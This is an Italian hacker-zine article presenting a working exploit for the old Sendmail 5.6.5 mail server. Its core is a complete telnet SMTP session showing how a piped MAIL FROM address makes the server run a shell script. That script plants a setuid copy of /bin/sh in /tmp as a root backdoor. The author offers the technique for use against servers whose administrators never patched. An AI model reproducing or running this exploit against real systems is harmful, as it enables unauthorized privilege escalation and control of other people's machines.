Copy Link
Add to Bookmark
Report
SENDMAIL 5.6.5 Exploit
Saaalvee lo so ke vi starete chiedendo perkè invece di scrivere un articolo su qualcosa di recente perdo tempo con un versione vecchia di sendmail...semplice:perkè è ancora parecchio diffusa!
Se la trovate su qualke server vuol dire ke il sysadmin non è proprio un genio e se ha lasciato una versione così vecchia non dovrebbe essersi preoccupato di patchare il tutto.
Cmq passiamo al dunque..tutto quello ke dovrete fare è molto semplice e lo riporto con un esempio pratico:
[/home/SoSpiro] |% telnet sysadmfesso.com 25
Trying 99.88.77.66 ...
Connected to sysadmfesso.com.
Escape character is '^]'.
220 sysadmfesso.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 25 Oct 1999 20:31:17
-0500
HELO
250 Hello sysadmfesso.com.
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with @.@ on a line by itself
From: sospiro"sysadmfesso.com
To: sospiro"panix.com
Return-Receipt-To: |foobar
Subject: Andiam andiam andiamo a bukar
X-Disclaimer: INFORMATION WANTS TO BE FREE
#!/bin/sh
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
chmod ugo+rx /tmp/bugshell
.
250 Ok
quit
221 sysadmfesso.com closing connection
Adesso avrete una bella "bugshell" nella directory /tmp.
So stanco,so stufo.